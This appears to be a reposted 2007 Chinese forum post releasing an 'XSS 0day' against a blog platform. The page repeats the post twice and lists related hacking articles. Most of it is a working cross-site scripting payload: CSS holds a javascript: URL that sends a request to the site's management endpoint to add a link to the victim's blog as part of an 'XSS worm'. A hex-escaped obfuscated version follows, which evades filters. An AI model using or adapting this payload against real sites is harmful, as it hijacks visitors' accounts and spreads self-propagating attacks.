XSS 0DAY代碼
更新時(shí)間:2007年03月08日 00:00:00 作者:
文章作者:茄子寶
信息來源:邪惡八進(jìn)制信息安全團(tuán)隊(duì)(www.eviloctal.com)
看到夢(mèng)之光芒放出來了!我也不藏了!
10月7日的時(shí)候我就發(fā)的日志,提示了大家!這里算是上次發(fā)的XSS WORM初嘗試的續(xù)吧.
其實(shí)很簡(jiǎn)單,就是兩次轉(zhuǎn)碼.
<DIV STYLE="background-image: url(javascript:var XmlHttp=new ActiveXObject("Microsoft.XMLhttp"); XmlHttp.Open("get","/manage/link.do?m=add&title=S0n9%20bl09&desc=This%20is%20XSS%20TEST%20%21&link=http%3A//s0n9.blog.sohu.com&_",true); XmlHttp.send(null);)">
ASCII轉(zhuǎn)碼參考 http://s0n9.blog.sohu.com/16002288.html
寫成下面16進(jìn)制轉(zhuǎn)義字符串
<div style="background-image:\0075\0072\006C\0028\006A\0061\0076\0061\0073\0063\0072\0069\0070\0074\003A\0065\0076\0061\006C\0028\0053\0074\0072\0069\006E\0067\002E\0066\0072\006F\006D\0043\0068\0061\0072\0043\006F\006......"></div>
信息來源:邪惡八進(jìn)制信息安全團(tuán)隊(duì)(www.eviloctal.com)
看到夢(mèng)之光芒放出來了!我也不藏了!
10月7日的時(shí)候我就發(fā)的日志,提示了大家!這里算是上次發(fā)的XSS WORM初嘗試的續(xù)吧.
其實(shí)很簡(jiǎn)單,就是兩次轉(zhuǎn)碼.
<DIV STYLE="background-image: url(javascript:var XmlHttp=new ActiveXObject("Microsoft.XMLhttp"); XmlHttp.Open("get","/manage/link.do?m=add&title=S0n9%20bl09&desc=This%20is%20XSS%20TEST%20%21&link=http%3A//s0n9.blog.sohu.com&_",true); XmlHttp.send(null);)">
ASCII轉(zhuǎn)碼參考 http://s0n9.blog.sohu.com/16002288.html
寫成下面16進(jìn)制轉(zhuǎn)義字符串
<div style="background-image:\0075\0072\006C\0028\006A\0061\0076\0061\0073\0063\0072\0069\0070\0074\003A\0065\0076\0061\006C\0028\0053\0074\0072\0069\006E\0067\002E\0066\0072\006F\006D\0043\0068\0061\0072\0043\006F\006......"></div>
相關(guān)文章
網(wǎng)絡(luò)安全滲透測(cè)試使用goby檢測(cè)log4j漏洞
這篇文章主要為大家介紹了網(wǎng)絡(luò)安全滲透測(cè)試使用goby檢測(cè)log4j漏洞的過程方法示例有需要的朋友可以借鑒參考下,希望能夠有所幫助,祝大家多多進(jìn)步2022-02-02變態(tài)入侵之有史以來最酷的Windows后門sethc.exe
變態(tài)入侵之有史以來最酷的Windows后門sethc.exe...2007-11-11